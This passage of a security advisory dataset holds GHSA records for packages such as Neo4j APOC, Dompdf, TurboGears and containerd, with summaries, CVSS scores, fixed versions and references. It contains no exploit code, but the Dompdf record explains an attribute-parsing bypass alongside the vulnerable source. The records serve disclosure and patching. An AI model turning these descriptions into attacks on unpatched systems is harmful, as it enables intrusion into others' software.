### Impact A XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this. External entities can be used to read local files, send HTTP requests, and perform denial-of-service attacks on the application. Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML. ### Patches The users should aim to use the latest released version compatible with their Neo4j version. The minimum versions containing patch for this vulnerability is 4.4.0.14. ### Workarounds If you cannot upgrade the library, you can control the [allowlist](https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist) of the procedures that can be used in your system. ### For more information If you have any questions or comments about this advisory: * Open an issue in [neo4j-apoc-procedures](https://github.com/neo4j-contrib/neo4j-apoc-procedures) * Email us at [security@neo4j.com](mailto:security@neo4j.com) ### Credits We want to publicly recognise the contribution of Christopher Schneider – State Farm.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/security/advisories/GHSA-9vx8-f5c4-862x'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/security/advisories/GHSA-6wxg-wh7f-rqpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23926'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/commit/c3e2a29020497acf9417879f38e8af4e8c6d5783'}, {'type': 'PACKAGE', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/tag/4.4.0.14'}]
{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T17:39:18Z', 'nvd_published_at': None}
1.4.0
GHSA-4jx2-hvqw-93j9
2023-03-02T18:39:18Z
2023-02-20T12:30:18Z
null
['CVE-2016-15026']
dd-plist XML External Entitly vulnerability
A vulnerability was found in 3breadt dd-plist 1.17 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. An attack has to be approached locally. Upgrading to version 1.18 is able to address this issue. The name of the patch is 8c954e8d9f6f6863729e50105a8abf3f87fff74c. It is recommended to upgrade the affected component. VDB-221486 is the identifier assigned to this vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.plist:dd-plist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15026'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/pull/26'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/commit/8c954e8d9f6f6863729e50105a8abf3f87fff74c'}, {'type': 'PACKAGE', 'url': 'https://github.com/3breadt/dd-plist'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/releases/tag/dd-plist-1.18'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221486'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221486'}]
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:08:04Z', 'nvd_published_at': '2023-02-20T11:15:00Z'}
1.4.0
GHSA-8q38-w56m-qq2c
2023-02-14T21:26:39Z
2023-02-04T09:30:21Z
null
['CVE-2019-25101']
Header injection in TurboGears
A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The name of the patch is f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'TurboGears'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.11.11'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25101'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/commit/f68bbaba47f4474e1da553aa51564a73e1d92a84'}, {'type': 'PACKAGE', 'url': 'https://github.com/OnShift/turbogears'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/releases/tag/v1.0.11.11'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220059'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220059'}]
{'cwe_ids': ['CWE-113'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:26:39Z', 'nvd_published_at': '2023-02-04T08:15:00Z'}
1.4.0
GHSA-x623-hr8h-7g5v
2023-02-10T22:32:39Z
2023-02-03T21:30:21Z
null
['CVE-2022-47762']
Path Traversal in gin-vue-admin
In gin-vue-admin < 2.5.5, the download module has a Path Traversal vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/flipped-aurora/gin-vue-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47762'}, {'type': 'WEB', 'url': 'https://github.com/flipped-aurora/gin-vue-admin/issues/1309'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:32:39Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}
1.4.0
GHSA-p64j-r5f4-pwwx
2023-02-06T23:38:18Z
2023-02-06T23:38:18Z
null
['CVE-2020-36067']
Improper Validation of Array Index in GJSON
GJSON < 1.6.6 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a crafted GET call.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36067'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/196'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/bf4efcb3c18d1825b2988603dea5909140a5302b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0054'}]
{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:38:18Z', 'nvd_published_at': None}
1.4.0
GHSA-56gj-mvh6-rp75
2023-02-08T16:18:55Z
2023-02-07T18:16:23Z
null
['CVE-2023-24813']
URI validation failure on SVG parsing. Bypass of CVE-2023-23924
### Summary Due to the difference in the attribute parser of Dompdf and php-svg-lib, an attacker can still call arbitrary URLs with arbitrary protocols. ### Details Dompdf parses the href attribute of `image` tags with the following code: [`src/Image/Cache.php` line 135-150](https://github.com/dompdf/dompdf/blob/2a8a6b80fcaa5148ace50f35a10979fe00c6a35d/src/Image/Cache.php#L135-L150) ``` php function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) { if (strtolower($name) === "image") { $attributes = array_change_key_case($attributes, CASE_LOWER); $url = $attributes["xlink:href"] ?? $attributes["href"]; if (!empty($url)) { $inner_full_url = Helpers::build_url($parsed_url["protocol"], $parsed_url["host"], $parsed_url["path"], $url); if ($inner_full_url === $full_url) { throw new ImageException("SVG self-reference is not allowed", E_WARNING); } [$resolved_url, $type, $message] = self::resolve_url($url, $parsed_url["protocol"], $parsed_url["host"], $parsed_url["path"], $options); if (!empty($message)) { throw new ImageException("This SVG document references a restricted resource. $message", E_WARNING); } } } }, ``` As you can see from the code snippet above, it respects `xlink:href` even if `href` is specified. ``` php $url = $attributes["xlink:href"] ?? $attributes["href"]; ``` However, php-svg-lib, which is later used to parse the svg file, parses the href attribute with the following code: [`src/Svg/Tag/Image.php` line 51-57](https://github.com/dompdf/php-svg-lib/blob/76876c6cf3080bcb6f249d7d59705108166a6685/src/Svg/Tag/Image.php#L51-L57) ``` php if (isset($attributes['xlink:href'])) { $this->href = $attributes['xlink:href']; } if (isset($attributes['href'])) { $this->href = $attributes['href']; } ``` Since `href` is respected if both `xlink:href` and `href` is specified, it's possible to bypass the protection on the Dompdf side by providing an empty `xlink:href` attribute. ### Impact An attacker can exploit the vulnerability to call arbitrary URLs with arbitrary protocols if they provide an SVG file to the Dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, which will lead, at the very least, to arbitrary file deletion and might lead to remote code execution, depending on available classes.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'dompdf/dompdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.2'}, {'fixed': '2.0.3'}]}], 'versions': ['2.0.2']}]
[{'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/security/advisories/GHSA-56gj-mvh6-rp75'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24813'}, {'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/commit/95009ea98230f9b084b040c34e3869ef3dccc9aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/dompdf/dompdf'}]
{'cwe_ids': ['CWE-436'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T18:16:23Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}
1.4.0
GHSA-mc8h-8q98-g5hr
2023-02-24T16:23:59Z
2023-02-24T16:23:59Z
null
[]
Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all
The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked. Thanks to the Rust security team for identifying the problem and alerting us to it.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'remove_dir_all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr'}, {'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead'}, {'type': 'PACKAGE', 'url': 'https://github.com/XAMPPRocky/remove_dir_all'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0018.html'}]
{'cwe_ids': ['CWE-366', 'CWE-367'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:59Z', 'nvd_published_at': None}
1.4.0
GHSA-q8gg-vj6m-hgmj
2023-03-03T00:11:24Z
2023-02-24T06:30:16Z
null
['CVE-2022-48345']
@braintree/sanitize-url Cross-site Scripting vulnerability
sanitize-url (aka @braintree/sanitize-url) before 6.0.1 allows XSS via HTML entities.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': '@braintree/sanitize-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48345'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/commit/d4bdc89f1743fe3cdb7c3f24b06e4c875f349b0c'}, {'type': 'PACKAGE', 'url': 'https://github.com/braintree/sanitize-url'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.0...v6.0.1'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.1...v6.0.2'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:15Z', 'nvd_published_at': '2023-02-24T06:15:00Z'}
1.4.0
GHSA-cf4g-fcf8-3cr9
2023-02-09T19:27:57Z
2023-02-09T19:27:57Z
null
[]
`pnet_packet` buffer overrun in `set_payload` setters
As indicated by this [issue](https://github.com/libpnet/libpnet/issues/449#issuecomment-663355987), a buffer overrun is possible in the `set_payload` setter of the various mutable "Packet" struct setters. The offending `set_payload` functions were defined within the struct `impl` blocks in earlier versions of the package, and later by the `packet` macro. Fixed in the `packet` macro by [this](https://github.com/libpnet/libpnet/pull/455) PR.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'pnet_packet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/libpnet/libpnet/issues/449'}, {'type': 'PACKAGE', 'url': 'https://github.com/libpnet/libpnet'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0167.html'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-09T19:27:57Z', 'nvd_published_at': None}
1.4.0
GHSA-vxpm-8hcp-qh27
2023-02-15T18:38:53Z
2023-02-03T21:07:28Z
null
['CVE-2023-23941']
Payment information sent to PayPal not necessarily identical to created order
### Impact If JavaScript-based PayPal checkout methods are used (PayPal Plus, Smart Payment Buttons, SEPA, Pay Later, Venmo, Credit card), the amount and item list sent to PayPal may not be identical to the one in the created order. ### Patches The problem has been fixed with version 5.4.4 ### Workarounds Disable the aforementioned payment methods or use the Security Plugin in version >= 1.0.21. ### References [Shopware blog post](https://news.shopware.com/security-issue-in-paypal-plugin-update-required)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'swag/paypal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/security/advisories/GHSA-vxpm-8hcp-qh27'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23941'}, {'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/commit/57db5f4a57ef0a1646b509b415de9f03bf441b08'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/SwagPayPal'}]
{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-03T21:07:28Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}
1.4.0
GHSA-32gr-x76g-267w
2023-02-16T23:33:30Z
2023-02-10T15:30:28Z
null
['CVE-2015-10077']
SQL injection in webbuilders-group silverstripe-kapost-bridge
A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'webbuilders-group/silverstripe-kapost-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10077'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/commit/2e14b0fd0ea35034f90890f364b130fb4645ff35'}, {'type': 'PACKAGE', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/releases/tag/0.4.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220471'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220471'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:33:30Z', 'nvd_published_at': '2023-02-10T15:15:00Z'}
1.4.0
GHSA-xw5j-gv2g-mjm2
2023-02-14T21:53:37Z
2023-02-14T21:53:37Z
null
[]
Miscompilation in cortex-m-rt 0.7.1 and 0.7.2
Version 0.7.1 of the `cortex-m-rt` crate introduced a regression causing the stack to NOT be eight-byte aligned prior to calling `main` (or any other specified entrypoint), violating the [stack ABI of AAPCS32], the default ABI used by all Cortex-M targets. This regression is also present in version 0.7.2 of the `cortex-m-rt` crate. This regression can cause certain compiler optimizations (which assume the eight-byte alignment) to produce incorrect behavior at runtime. This incorrect behavior has been [observed in real-world applications]. **It is advised that ALL users of `v0.7.1` and `v0.7.2` of the `cortex-m-rt` crate update to the latest version (`v0.7.3`), AS SOON AS POSSIBLE.** Users of `v0.7.0` and prior versions of `cortex-m-rt` are not affected by this regression. It will be necessary to rebuild all affected firmware binaries, and flash or deploy the new firmware binaries to affected devices. [stack ABI of AAPCS32]: https://github.com/ARM-software/abi-aa/blob/edd7460d87493fff124b8b5713acf71ffc06ee91/aapcs32/aapcs32.rst#6212stack-constraints-at-a-public-interface [observed in real-world applications]: https://github.com/peter9477/test2
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'cortex-m-rt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.3'}]}]}]
[{'type': 'PACKAGE', 'url': 'https://github.com/rust-embedded/cortex-m'}, {'type': 'WEB', 'url': 'https://github.com/rust-embedded/cortex-m/discussions/469'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0014.html'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:53:37Z', 'nvd_published_at': None}
1.4.0
GHSA-mhgm-52vg-pvvc
2023-02-16T14:12:04Z
2023-02-16T14:12:04Z
null
[]
Privilege escalation in Strongbox
### Impact An attacker with read-only access to a Strongbox secret could craft a valid encrypted secret (same id/version). It also makes the audit logs from KMS less useful. The issue is caused by a bug in the underlying AWS Encryption SDK. By default, the encrypted secrets are stored in DynamoDB and an attacker with read-only access would not be able to write the encrypted secret to DynamoDB. So in practice the impact should be limited for most users. Strongbox supports storing data in files as an alternative to DynamoDB. If the attacker had write access to where the files are stored they could make the attack work end-to-end. Similarly, any custom storage backend could also be affected. In order to be backwards compatible Strongbox will not make use of key commitments (another improvement to the AWS Encryption SDK). Strongbox enforces that only one KMS key can be used, and it must match the expected one. This means that an attacker needs write access to both KMS and DynamoDB (or other storage backend) to stage an attack, which is not a scenario Strongbox is designed to protect against. ### Patches Fixed in version 0.5.0. ### Workarounds None ### References - https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r - https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#key-commitment
[]
[{'package': {'ecosystem': 'Maven', 'name': 'com.schibsted.security:strongbox-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/security/advisories/GHSA-mhgm-52vg-pvvc'}, {'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/commit/e61f7c36efa898e8b44de6222cd66d2bcdd073e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/schibsted/strongbox'}]
{'cwe_ids': ['CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:12:04Z', 'nvd_published_at': None}
1.4.0
GHSA-p9w8-2mpq-49h9
2023-02-14T16:47:13Z
2023-02-04T06:30:15Z
null
['CVE-2018-25079']
is-url Inefficient Regular Expression Complexity vulnerability
A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is an unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address this issue. The name of the patch is 149550935c63a98c11f27f694a7c4a9479e53794. It is recommended to upgrade the affected component. VDB-220058 is the identifier assigned to this vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'is-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25079'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/commit/149550935c63a98c11f27f694a7c4a9479e53794'}, {'type': 'PACKAGE', 'url': 'https://github.com/segmentio/is-url'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/releases/tag/v1.2.3'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220058'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220058'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T00:59:15Z', 'nvd_published_at': '2023-02-04T04:15:00Z'}
1.4.0
GHSA-rfhw-fm4m-52j6
2023-02-17T21:32:40Z
2023-02-10T21:30:24Z
null
['CVE-2023-0777']
Authentication Bypass in modoboa
Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0777'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html'}]
{'cwe_ids': ['CWE-305'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:31:45Z', 'nvd_published_at': '2023-02-10T19:15:00Z'}
1.4.0
GHSA-p7wj-c85f-xq9h
2023-02-16T21:52:22Z
2023-02-08T09:30:24Z
null
['CVE-2023-0741']
Answer has Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - DOM in GitHub repository answerdev/answer prior to 1.0.4.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0741'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3001de52af91f09c96e701facbce0b9fa0c98ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/78233bfa-871d-45e1-815f-dee73e397809'}]
{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:36:22Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}
1.4.0
GHSA-hmfx-3pcx-653p
2023-02-16T17:38:22Z
2023-02-16T14:11:33Z
null
['CVE-2023-25173']
Supplementary groups are not set up properly in github.com/containerd/containerd
### Impact A bug was found in containerd where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container. Downstream applications that use the containerd client library may be affected as well. ### Patches This bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions. ### Workarounds Ensure that the `"USER $USERNAME"` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT ["su", "-", "user"]` to allow `su` to properly set up supplementary groups. ### References - https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/ - Docker/Moby: CVE-2022-36109, fixed in Docker 20.10.18 - CRI-O: CVE-2022-2995, fixed in CRI-O 1.25.0 - Podman: CVE-2022-2989, fixed in Podman 3.0.1 and 4.2.0 - Buildah: CVE-2022-2990, fixed in Buildah 1.27.1 Note that CVE IDs apply to a particular implementation, even if an issue is common. ### For more information If you have any questions or comments about this advisory: * Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose) * Email us at [security@containerd.io](mailto:security@containerd.io) To report a security issue in containerd: * [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new) * Email us at [security@containerd.io](mailto:security@containerd.io)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.18'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-hmfx-3pcx-653p'}, {'type': 'WEB', 'url': 'https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25173'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/133f6bb6cd827ce35a5fb279c1ead12b9d21460a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-4wjj-jwc9-2x96'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-fjm8-m7m6-2fjp'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-phjr-8j92-w5v7'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.18'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.6.18'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1574'}, {'type': 'WEB', 'url': 'https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/'}]
